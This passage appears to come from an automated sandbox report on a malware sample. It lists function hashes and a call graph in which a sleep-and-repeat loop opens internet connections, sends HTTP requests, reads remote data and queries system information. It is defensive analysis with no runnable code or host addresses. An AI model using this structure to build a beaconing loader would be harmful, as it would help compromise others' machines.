                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6e4e1352645599e73992d0c42c029a607fad52c5201b553e4701f1015b24a13
                                                        • Instruction ID: 6e2fc053e57b8b6014fc6cacb2afcdc3843c3745d2e4a6af90032ad39c3b8c3c
                                                        • Opcode Fuzzy Hash: d6e4e1352645599e73992d0c42c029a607fad52c5201b553e4701f1015b24a13
                                                        • Instruction Fuzzy Hash: 7321B0EB20C2307E7042A1863F64AF7676DE5D2B3033084A7F64BD7602F2991A496231
                                                        Function 04B207DE Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58f547a4346d31a2181e070b1967699d7ddccb7f65ed9813f17b0aade997c98d
                                                        • Instruction ID: d599f94bd46563259fcfaccfe180b0b9549ffade9f440be163aa07108aba8200
                                                        • Opcode Fuzzy Hash: 58f547a4346d31a2181e070b1967699d7ddccb7f65ed9813f17b0aade997c98d
                                                        • Instruction Fuzzy Hash: 0521A1EB20C2307E7042A0963F64AF7676DE5D6730330C4ABF64BC6502F2992E49A271
                                                        Function 04B207C6 Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 180b54da711ca841af9ad95ee6faabc7d55c9f5e97a2ed01c450ef7ab3480102
                                                        • Instruction ID: ccc4ab0a3c404645fa530b21ef279f715a05df39433359084f950cd4d23fff2d
                                                        • Opcode Fuzzy Hash: 180b54da711ca841af9ad95ee6faabc7d55c9f5e97a2ed01c450ef7ab3480102
                                                        • Instruction Fuzzy Hash: 102105EB20C2207E7042E0863F24AF7676DD5D6730330C4A7F54BD7642F2991A89A271
                                                        Function 04B207ED Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8af50b9928c57c70aeff42d6864cb7d9317acaff96e57c3c649b860302402394
                                                        • Instruction ID: 3bbde8afb2a767f56ed02c43d9be17e1ee29b984cdedebb54c8d960d9992b8e9
                                                        • Opcode Fuzzy Hash: 8af50b9928c57c70aeff42d6864cb7d9317acaff96e57c3c649b860302402394
                                                        • Instruction Fuzzy Hash: A1113AE720C2707E7042A0913B646F76B6DE5D2730330C4B7F54BDB603F1891A49A271
                                                        Function 04B20806 Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02cad88af5669b9ac835bdb0ad986a369bc1237a52d35c088e5fcb5fe2a44790
                                                        • Instruction ID: 7371ea482e59466f2ea2020fa67f2c79b263bde4d2a48ba2c1f4cbe1892a4639
                                                        • Opcode Fuzzy Hash: 02cad88af5669b9ac835bdb0ad986a369bc1237a52d35c088e5fcb5fe2a44790
                                                        • Instruction Fuzzy Hash: 471157E720C220BFB212E0522F146F7776DDAC273073084AAF146C7543F1591A48A272
                                                        Function 04B20839 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7993dadfc36ace0222dd368835953317295b1dffb09b633b831738ba74c8e1e4
                                                        • Instruction ID: 5314e378819cd7bab89bdca9f837e0b8633fc27bb0309fcae3662533965f922f
                                                        • Opcode Fuzzy Hash: 7993dadfc36ace0222dd368835953317295b1dffb09b633b831738ba74c8e1e4
                                                        • Instruction Fuzzy Hash: 591123E72092247FB202A1963F64AF7776DEAC373033085AAF54AD7542E2591E4DA231
                                                        Function 04B208AF Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13b5cf433b773891578983fdc61484f8c047447d336063286f162dcb4e6c185a
                                                        • Instruction ID: 739563ce1c35c00249ef27a9d646b6e554fcccdb489fffdf587cd600bc37d32a
                                                        • Opcode Fuzzy Hash: 13b5cf433b773891578983fdc61484f8c047447d336063286f162dcb4e6c185a
                                                        • Instruction Fuzzy Hash: B41127E720D2A06FE24291A52F64AF72B69DAD733433045E7F246CB183D14A194A9371
                                                        Function 04B20853 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 33fb41bd86c7b70a49aebe79d673d09d6b3ff4e78503fb97490cbbf9ce063003
                                                        • Instruction ID: 8614f80fb9c34cea8e3e8edb3bf30930447358c56976abcde6a800eb314adfa5
                                                        • Opcode Fuzzy Hash: 33fb41bd86c7b70a49aebe79d673d09d6b3ff4e78503fb97490cbbf9ce063003
                                                        • Instruction Fuzzy Hash: E40122E720C2207EB042E1963F28AF7676DE6D2730330C967F547C7543E2991A49A231
                                                        Function 04B2091C Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45d2d5aaa76668fad618681ecedea447fa869235f47871bdec920857123995ec
                                                        • Instruction ID: 4234a45e452f3e06a55b46fdcad8326830d9a19340ae1bc9ab4a39428f88b6c9
                                                        • Opcode Fuzzy Hash: 45d2d5aaa76668fad618681ecedea447fa869235f47871bdec920857123995ec
                                                        • Instruction Fuzzy Hash: 37E092A724D1702DA552A4A63B14EF77B69E4E6672331C8E3F246D7002E04D5A4AA370

                                                        Execution Graph

                                                        Execution Coverage:8.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:9.4%
                                                        Total number of Nodes:1869
                                                        Total number of Limit Nodes:19
                                                        execution_graph 13384 dcb8b9 13391 dcb7b5 13384->13391 13386 dcb8e1 Concurrency::details::_Reschedule_chore 13387 dcb906 13386->13387 13399 dccbae 13386->13399 13403 dcb718 13387->13403 13390 dcb91e 13392 dcb7c1 Concurrency::details::_Reschedule_chore 13391->13392 13393 dcb7f2 13392->13393 13394 dcc6ac GetSystemTimePreciseAsFileTime 13392->13394 13393->13386 13395 dcb7d6 13394->13395 13413 db2b10 13395->13413 13397 dcb7dc __Mtx_unlock 13398 db2b10 6 API calls 13397->13398 13398->13393 13400 dccbcc 13399->13400 13401 dccbbc TpCallbackUnloadDllOnCompletion 13399->13401 13400->13387 13401->13400 13404 dcb724 Concurrency::details::_Reschedule_chore 13403->13404 13405 dcc6ac GetSystemTimePreciseAsFileTime 13404->13405 13406 dcb77e 13404->13406 13407 dcb739 13405->13407 13406->13390 13408 db2b10 6 API calls 13407->13408 13409 dcb73f __Mtx_unlock 13408->13409 13410 db2b10 6 API calls 13409->13410 13411 dcb75c __Cnd_broadcast 13410->13411 13411->13406 13412 db2b10 6 API calls 13411->13412 13412->13406 13414 db2b1a 13413->13414 13415 db2b1c 13413->13415 13414->13397 13416 dcc26a 6 API calls 13415->13416 13417 db2b22 13416->13417 13418 de38af ___std_exception_copy RtlAllocateHeap 13417->13418 13419 db2b68 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13418->13419 13419->13397 13198 db7430 13211 dc7a00 13198->13211 13200 db7465 13201 dc7a00 RtlAllocateHeap 13200->13201 13202 db7478 13201->13202 13203 dc7a00 RtlAllocateHeap 13202->13203 13204 db7488 13203->13204 13205 dc7a00 RtlAllocateHeap 13204->13205 13206 db749d 13205->13206 13207 dc7a00 RtlAllocateHeap 13206->13207 13208 db74b2 13207->13208 13209 dc7a00 RtlAllocateHeap 13208->13209 13210 db74c4 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13209->13210 13212 dc7a26 13211->13212 13213 dc7a2d 13212->13213 13214 dc7a62 13212->13214 13217 dc7a81 13212->13217 13213->13200 13215 dc7ab9 13214->13215 13216 dc7a69 13214->13216 13230 db2480 13215->13230 13222 dcd3e2 13216->13222 13219 dcd3e2 RtlAllocateHeap 13217->13219 13221 dc7a6f __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13217->13221 13219->13221 13221->13200 13224 dcd3e7 __fassign 13222->13224 13225 dcd401 13224->13225 13226 db2480 std::_Xinvalid_argument 13224->13226 13234 de8be1 13224->13234 13225->13221 13229 dcd40d std::_Xinvalid_argument 13226->13229 13238 de38af 13226->13238 13228 db24c3 13228->13221 13229->13221 13231 db248e std::_Xinvalid_argument 13230->13231 13232 de38af ___std_exception_copy RtlAllocateHeap 13231->13232 13233 db24c3 13232->13233 13233->13221 13237 deb04b __fassign 13234->13237 13235 deb074 RtlAllocateHeap 13236 deb087 __dosmaperr 13235->13236 13235->13237 13236->13224 13237->13235 13237->13236 13239 de38bc 13238->13239 13241 de38d9 ___std_exception_copy 13238->13241 13240 de8be1 ___std_exception_copy RtlAllocateHeap 13239->13240 13239->13241 13240->13241 13241->13228 15069 db7990 15070 dc7a00 RtlAllocateHeap 15069->15070 15071 db79db 15070->15071 15072 db5c10 6 API calls 15071->15072 15073 db79e3 15072->15073 15074 dc8320 RtlAllocateHeap 15073->15074 15075 db79f3 15074->15075 15076 dc7a00 RtlAllocateHeap 15075->15076 15077 db7a0e 15076->15077 15078 db5c10 6 API calls 15077->15078 15079 db7a15 15078->15079 15080 dc80c0 RtlAllocateHeap 15079->15080 15082 db7a38 shared_ptr 15080->15082 15081 db7aa5 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 15082->15081 15103 db6d70 15082->15103 15084 db7b1b shared_ptr 15085 dc7a00 RtlAllocateHeap 15084->15085 15102 db7c06 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 15084->15102 15086 db7b75 15085->15086 15087 db5c10 6 API calls 15086->15087 15088 db7b7d 15087->15088 15089 dc7a00 RtlAllocateHeap 15088->15089 15090 db7b98 15089->15090 15091 db5c10 6 API calls 15090->15091 15092 db7ba0 15091->15092 15093 dc8320 RtlAllocateHeap 15092->15093 15094 db7bb1 15093->15094 15095 dc8220 RtlAllocateHeap 15094->15095 15096 db7bc1 15095->15096 15097 dc7a00 RtlAllocateHeap 15096->15097 15098 db7bdc 15097->15098 15099 db5c10 6 API calls 15098->15099 15100 db7be3 15099->15100 15101 dc80c0 RtlAllocateHeap 15100->15101 15101->15102 15104 db6db0 15103->15104 15105 db6dca 15104->15105 15106 db6df5 15104->15106 15107 dc80c0 RtlAllocateHeap 15105->15107 15108 dc80c0 RtlAllocateHeap 15106->15108 15109 db6deb shared_ptr 15107->15109 15108->15109 15109->15084 15117 db91b0 15118 db91e5 15117->15118 15119 dc80c0 RtlAllocateHeap 15118->15119 15120 db9218 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 15119->15120 15139 db8b30 15140 db8b7c 15139->15140 15141 dc7a00 RtlAllocateHeap 15140->15141 15142 db8b8c 15141->15142 15143 db5c10 6 API calls 15142->15143 15144 db8b97 15143->15144 15145 dc80c0 RtlAllocateHeap 15144->15145 15146 db8be3 15145->15146 15147 dc80c0 RtlAllocateHeap 15146->15147 15148 db8c35 15147->15148 15149 dc8220 RtlAllocateHeap 15148->15149 15150 db8c47 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 15149->15150 13420 dc6c70 13423 dc6ca0 13420->13423 13421 dc7a00 RtlAllocateHeap 13421->13423 13422 db5c10 6 API calls 13422->13423 13423->13421 13423->13422 13426 dc47b0 13423->13426 13425 dc6cec Sleep 13425->13423 13427 dc47eb 13426->13427 13507 dc4e70 shared_ptr 13426->13507 13429 dc7a00 RtlAllocateHeap 13427->13429 13427->13507 13428 dc4f59 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13428->13425 13430 dc480c 13429->13430 13687 db5c10 13430->13687 13432 dc4813 13434 dc7a00 RtlAllocateHeap 13432->13434 13435 dc4825 13434->13435 13437 dc7a00 RtlAllocateHeap 13435->13437 13436 dc5015 13782 db6950 13436->13782 13439 dc4837 13437->13439 13694 dbbe30 13439->13694 13441 dc4843 13443 dc7a00 RtlAllocateHeap 13441->13443 13442 dc50de shared_ptr 13792 db7d30 13442->13792 13447 dc4858 13443->13447 13445 dc50ed 13871 db45b0 13445->13871 13446 dc5025 shared_ptr 13446->13442 13469 dc6c46 13446->13469 13449 dc7a00 RtlAllocateHeap 13447->13449 13451 dc4870 13449->13451 13450 dc50fa 13875 db8380 13450->13875 13453 db5c10 6 API calls 13451->13453 13455 dc4877 13453->13455 13454 dc5106 13456 db45b0 RtlAllocateHeap 13454->13456 13718 db8580 13455->13718 13458 dc5113 13456->13458 13465 db45b0 RtlAllocateHeap 13458->13465 13459 dc4883 13461 dc7a00 RtlAllocateHeap 13459->13461 13544 dc4afd 13459->13544 13460 db5c10 6 API calls 13460->13469 13466 dc489f 13461->13466 13462 dc7a00 RtlAllocateHeap 13463 dc4b2f 13462->13463 13468 dc7a00 RtlAllocateHeap 13463->13468 13464 dc7a00 RtlAllocateHeap 13464->13469 13470 dc5130 13465->13470 13467 dc7a00 RtlAllocateHeap 13466->13467 13471 dc48b7 13467->13471 13472 dc4b44 13468->13472 13469->13460 13469->13464 13479 dc47b0 18 API calls 13469->13479 13473 dc7a00 RtlAllocateHeap 13470->13473 13474 db5c10 6 API calls 13471->13474 13475 dc7a00 RtlAllocateHeap 13472->13475 13476 dc514e 13473->13476 13477 dc48be 13474->13477 13478 dc4b56 13475->13478 13480 db5c10 6 API calls 13476->13480 13481 db8580 RtlAllocateHeap 13477->13481 13482 dbbe30 12 API calls 13478->13482 13483 dc6cec Sleep 13479->13483 13484 dc5155 13480->13484 13485 dc48ca 13481->13485 13486 dc4b62 13482->13486 13483->13469 13487 dc7a00 RtlAllocateHeap 13484->13487 13491 dc7a00 RtlAllocateHeap 13485->13491 13485->13544 13489 dc7a00 RtlAllocateHeap 13486->13489 13488 dc516a 13487->13488 13490 db5c10 6 API calls 13488->13490 13492 dc4b77 13489->13492 13493 dc5171 13490->13493 13494 dc48e7 13491->13494 13495 dc7a00 RtlAllocateHeap 13492->13495 13505 dc80c0 RtlAllocateHeap 13493->13505 13496 db5c10 6 API calls 13494->13496 13497 dc4b8f 13495->13497 13501 dc48ef 13496->13501 13498 db5c10 6 API calls 13497->13498 13499 dc4b96 13498->13499 13500 db8580 RtlAllocateHeap 13499->13500 13502 dc4ba2 13500->13502 13503 dc80c0 RtlAllocateHeap 13501->13503 13504 dc7a00 RtlAllocateHeap 13502->13504 13502->13507 13513 dc4959 shared_ptr 13503->13513 13506 dc4bbe 13504->13506 13514 dc51ed 13505->13514 13508 dc7a00 RtlAllocateHeap 13506->13508 13507->13428 13760 db65e0 13507->13760 13509 dc4bd6 13508->13509 13510 db5c10 6 API calls 13509->13510 13512 dc4bdd 13510->13512 13511 dc7a00 RtlAllocateHeap 13515 dc49e6 13511->13515 13517 db8580 RtlAllocateHeap 13512->13517 13513->13511 13887 dc7de0 13514->13887 13516 db5c10 6 API calls 13515->13516 13524 dc49ee 13516->13524 13520 dc4be9 13517->13520 13519 dc5259 13900 dc7760 13519->13900 13520->13507 13523 dc7a00 RtlAllocateHeap 13520->13523 13522 dc52b8 13536 dc5335 shared_ptr 13522->13536 13912 dc8ca0 13522->13912 13525 dc4c06 13523->13525 13526 dc80c0 RtlAllocateHeap 13524->13526 13527 db5c10 6 API calls 13525->13527 13532 dc4a49 shared_ptr 13526->13532 13529 dc4c0e 13527->13529 13530 dc4c5a 13529->13530 13531 dc4f97 13529->13531 13535 dc80c0 RtlAllocateHeap 13530->13535 13754 dc8200 13531->13754 13532->13544 13724 db98f0 13532->13724 13545 dc4c78 shared_ptr 13535->13545 13538 dc80c0 RtlAllocateHeap 13536->13538 13537 dc4f9c 13757 dcc1d9 13537->13757 13550 dc53fd shared_ptr 13538->13550 13540 dc4ad5 __dosmaperr 13540->13544 13729 de8ab6 13540->13729 13541 dc7a00 RtlAllocateHeap 13543 dc4d05 13541->13543 13546 db5c10 6 API calls 13543->13546 13544->13462 13544->13537 13545->13507 13545->13541 13553 dc4d0d 13546->13553 13547 db45b0 RtlAllocateHeap 13548 dc549d 13547->13548 13549 dc7a00 RtlAllocateHeap 13548->13549 13551 dc54b7 13549->13551 13550->13547 13552 db5c10 6 API calls 13551->13552 13554 dc54c2 13552->13554 13555 dc80c0 RtlAllocateHeap 13553->13555 13556 db45b0 RtlAllocateHeap 13554->13556 13559 dc4d68 shared_ptr 13555->13559 13557 dc54d7 13556->13557 13558 dc7a00 RtlAllocateHeap 13557->13558 13561 dc54eb 13558->13561 13559->13507 13560 dc7a00 RtlAllocateHeap 13559->13560 13562 dc4df7 13560->13562 13563 db5c10 6 API calls 13561->13563 13564 dc7a00 RtlAllocateHeap 13562->13564 13565 dc54f6 13563->13565 13566 dc4e0c 13564->13566 13567 dc7a00 RtlAllocateHeap 13565->13567 13568 dc7a00 RtlAllocateHeap 13566->13568 13569 dc5514 13567->13569 13570 dc4e27 13568->13570 13571 db5c10 6 API calls 13569->13571 13572 db5c10 6 API calls 13570->13572 13573 dc551f 13571->13573 13574 dc4e2e 13572->13574 13575 dc7a00 RtlAllocateHeap 13573->13575 13578 dc80c0 RtlAllocateHeap 13574->13578 13576 dc553d 13575->13576 13577 db5c10 6 API calls 13576->13577 13579 dc5548 13577->13579 13580 dc4e67 13578->13580 13581 dc7a00 RtlAllocateHeap 13579->13581 13733 dc4390 13580->13733 13583 dc5566 13581->13583 13584 db5c10 6 API calls 13583->13584 13585 dc5571 13584->13585 13586 dc7a00 RtlAllocateHeap 13585->13586 13587 dc558f 13586->13587 13588 db5c10 6 API calls 13587->13588 13589 dc559a 13588->13589 13590 dc7a00 RtlAllocateHeap 13589->13590 13591 dc55b8 13590->13591 13592 db5c10 6 API calls 13591->13592 13593 dc55c3 13592->13593 13594 dc7a00 RtlAllocateHeap 13593->13594 13595 dc55e1 13594->13595 13596 db5c10 6 API calls 13595->13596 13597 dc55ec 13596->13597 13598 dc7a00 RtlAllocateHeap 13597->13598 13599 dc560a 13598->13599 13600 db5c10 6 API calls 13599->13600 13601 dc5615 13600->13601 13602 dc7a00 RtlAllocateHeap 13601->13602 13603 dc5631 13602->13603 13604 db5c10 6 API calls 13603->13604 13605 dc563c 13604->13605 13606 dc7a00 RtlAllocateHeap 13605->13606 13607 dc5653 13606->13607 13608 db5c10 6 API calls 13607->13608 13609 dc565e 13608->13609 13610 dc7a00 RtlAllocateHeap 13609->13610 13611 dc5675 13610->13611 13612 db5c10 6 API calls 13611->13612 13613 dc5680 13612->13613 13614 dc7a00 RtlAllocateHeap 13613->13614 13615 dc569c 13614->13615 13616 db5c10 6 API calls 13615->13616 13617 dc56a7 13616->13617 13924 dc8320 13617->13924 13619 dc56bb 13928 dc8220 13619->13928 13621 dc56cf 13622 dc8220 RtlAllocateHeap 13621->13622 13623 dc56e3 13622->13623 13624 dc8220 RtlAllocateHeap 13623->13624 13625 dc56f7 13624->13625 13626 dc8320 RtlAllocateHeap 13625->13626 13627 dc570b 13626->13627 13628 dc8220 RtlAllocateHeap 13627->13628 13629 dc571f 13628->13629 13630 dc8320 RtlAllocateHeap 13629->13630 13631 dc5733 13630->13631 13632 dc8220 RtlAllocateHeap 13631->13632 13633 dc5747 13632->13633 13634 dc8320 RtlAllocateHeap 13633->13634 13635 dc575b 13634->13635 13636 dc8220 RtlAllocateHeap 13635->13636 13637 dc576f 13636->13637 13638 dc8320 RtlAllocateHeap 13637->13638 13639 dc5783 13638->13639 13640 dc8220 RtlAllocateHeap 13639->13640 13641 dc5797 13640->13641 13642 dc8320 RtlAllocateHeap 13641->13642 13643 dc57ab 13642->13643 13644 dc8220 RtlAllocateHeap 13643->13644 13645 dc57bf 13644->13645 13646 dc8320 RtlAllocateHeap 13645->13646 13647 dc57d3 13646->13647 13648 dc8220 RtlAllocateHeap 13647->13648 13649 dc57e7 13648->13649 13650 dc8320 RtlAllocateHeap 13649->13650 13651 dc57fb 13650->13651 13652 dc8220 RtlAllocateHeap 13651->13652 13653 dc580f 13652->13653 13654 dc8320 RtlAllocateHeap 13653->13654 13655 dc5823 13654->13655 13656 dc8220 RtlAllocateHeap 13655->13656 13657 dc5837 13656->13657 13658 dc8220 RtlAllocateHeap 13657->13658 13659 dc584b 13658->13659 13660 dc8220 RtlAllocateHeap 13659->13660 13661 dc585f 13660->13661 13662 dc8320 RtlAllocateHeap 13661->13662 13663 dc5873 shared_ptr 13662->13663 13664 dc665b 13663->13664 13665 dc6507 13663->13665 13666 dc7a00 RtlAllocateHeap 13664->13666 13667 dc7a00 RtlAllocateHeap 13665->13667 13668 dc6670 13666->13668 13669 dc651d 13667->13669 13671 dc7a00 RtlAllocateHeap 13668->13671 13670 db5c10 6 API calls 13669->13670 13672 dc6528 13670->13672 13673 dc6685 13671->13673 13674 dc8320 RtlAllocateHeap 13672->13674 13936 db49a0 13673->13936 13686 dc653c shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13674->13686 13676 dc6694 13677 dc7760 RtlAllocateHeap 13676->13677 13683 dc66db 13677->13683 13678 dc67d6 13679 dc7a00 RtlAllocateHeap 13678->13679 13680 dc67ec 13679->13680 13682 db5c10 6 API calls 13680->13682 13681 dc8ca0 RtlAllocateHeap 13681->13683 13684 dc67f7 13682->13684 13683->13678 13683->13681 13685 dc8220 RtlAllocateHeap 13684->13685 13685->13686 13686->13425 13943 db5940 13687->13943 13691 db5c6a 13962 db4b30 13691->13962 13693 db5c7b shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13693->13432 13695 dbbe82 13694->13695 13696 dbc281 13694->13696 13695->13696 13698 dbbe96 Sleep InternetOpenW InternetConnectA 13695->13698 13697 dc80c0 RtlAllocateHeap 13696->13697 13703 dbc22e shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13697->13703 13699 dc7a00 RtlAllocateHeap 13698->13699 13700 dbbf18 13699->13700 13701 db5c10 6 API calls 13700->13701 13702 dbbf23 HttpOpenRequestA 13701->13702 13705 dbbf4c shared_ptr 13702->13705 13703->13441 13706 dc7a00 RtlAllocateHeap 13705->13706 13707 dbbfb4 13706->13707 13708 db5c10 6 API calls 13707->13708 13709 dbbfbf 13708->13709 13710 dc7a00 RtlAllocateHeap 13709->13710 13711 dbbfd8 13710->13711 13712 db5c10 6 API calls 13711->13712 13713 dbbfe3 HttpSendRequestA 13712->13713 13716 dbc006 shared_ptr 13713->13716 13715 dbc08e InternetReadFile 13717 dbc0b5 13715->13717 13716->13715 13722 db86a0 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13718->13722 13723 db85d5 shared_ptr 13718->13723 13719 db8767 13721 dc8200 RtlAllocateHeap 13719->13721 13720 dc80c0 RtlAllocateHeap 13720->13723 13721->13722 13722->13459 13723->13719 13723->13720 13723->13722 13725 dc7a00 RtlAllocateHeap 13724->13725 13726 db991e 13725->13726 13727 db5c10 6 API calls 13726->13727 13728 db9927 shared_ptr __cftof __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13727->13728 13728->13540 13730 de8ad1 13729->13730 14018 de8868 13730->14018 13732 de8adb 13732->13544 13734 dc7a00 RtlAllocateHeap 13733->13734 13735 dc43d2 13734->13735 13736 dc7a00 RtlAllocateHeap 13735->13736 13737 dc43e4 13736->13737 13738 db8580 RtlAllocateHeap 13737->13738 13739 dc43ed 13738->13739 13740 dc4646 13739->13740 13752 dc43f8 shared_ptr 13739->13752 13741 dc7a00 RtlAllocateHeap 13740->13741 13742 dc4657 13741->13742 13743 dc7a00 RtlAllocateHeap 13742->13743 13745 dc466c 13743->13745 13744 dc80c0 RtlAllocateHeap 13744->13752 13746 dc7a00 RtlAllocateHeap 13745->13746 13748 dc467e 13746->13748 13749 dc3640 16 API calls 13748->13749 13751 dc4610 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13749->13751 13750 dc7a00 RtlAllocateHeap 13750->13752 13751->13507 13752->13744 13752->13750 13752->13751 14024 dc9280 13752->14024 14029 dc3640 13752->14029 13755 dcc1d9 RtlAllocateHeap 13754->13755 13756 dc820a 13755->13756 13756->13537 14785 dcc15d 13757->14785 13759 dcc1ea std::_Xinvalid_argument 13759->13507 13761 db663f 13760->13761 13762 dc7a00 RtlAllocateHeap 13761->13762 13763 db66a6 13762->13763 13764 db5c10 6 API calls 13763->13764 13765 db66b1 13764->13765 13766 db22c0 5 API calls 13765->13766 13767 db66c9 shared_ptr 13766->13767 13768 dc7a00 RtlAllocateHeap 13767->13768 13780 db68e3 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13767->13780 13769 db6732 13768->13769 13770 db5c10 6 API calls 13769->13770 13771 db673d 13770->13771 13772 db22c0 5 API calls 13771->13772 13781 db6757 shared_ptr 13772->13781 13773 db6852 13774 dc80c0 RtlAllocateHeap 13773->13774 13776 db689c 13774->13776 13775 dc7a00 RtlAllocateHeap 13775->13781 13777 dc80c0 RtlAllocateHeap 13776->13777 13777->13780 13778 db5c10 6 API calls 13778->13781 13779 db22c0 5 API calls 13779->13781 13780->13436 13781->13773 13781->13775 13781->13778 13781->13779 13781->13780 13790 db6ca1 13782->13790 13791 db69c8 shared_ptr 13782->13791 13783 db6d63 13786 dc8200 RtlAllocateHeap 13783->13786 13784 db6cc4 13785 dc80c0 RtlAllocateHeap 13784->13785 13788 db6ce3 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13785->13788 13786->13788 13787 dc80c0 RtlAllocateHeap 13787->13791 13788->13446 13789 dc9280 RtlAllocateHeap 13789->13791 13790->13783 13790->13784 13791->13783 13791->13787 13791->13788 13791->13789 13791->13790 13793 db7d96 __cftof 13792->13793 13794 dc7a00 RtlAllocateHeap 13793->13794 13828 db7ee8 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13793->13828 13795 db7dc7 13794->13795 13796 db5c10 6 API calls 13795->13796 13797 db7dd2 13796->13797 13798 dc7a00 RtlAllocateHeap 13797->13798 13799 db7df4 13798->13799 13800 db5c10 6 API calls 13799->13800 13802 db7dff shared_ptr 13800->13802 13801 db7ed3 GetNativeSystemInfo 13803 db7ed7 13801->13803 13802->13801 13802->13803 13802->13828 13804 db8019 13803->13804 13805 db7f3f 13803->13805 13803->13828 13806 dc7a00 RtlAllocateHeap 13804->13806 13807 dc7a00 RtlAllocateHeap 13805->13807 13808 db8045 13806->13808 13809 db7f60 13807->13809 13810 db5c10 6 API calls 13808->13810 13811 db5c10 6 API calls 13809->13811 13812 db804c 13810->13812 13813 db7f67 13811->13813 13814 dc7a00 RtlAllocateHeap 13812->13814 13815 dc7a00 RtlAllocateHeap 13813->13815 13816 db8064 13814->13816 13817 db7f7f 13815->13817 13819 db5c10 6 API calls 13816->13819 13818 db5c10 6 API calls 13817->13818 13821 db7f86 13818->13821 13820 db806b 13819->13820 13822 dc7a00 RtlAllocateHeap 13820->13822 14788 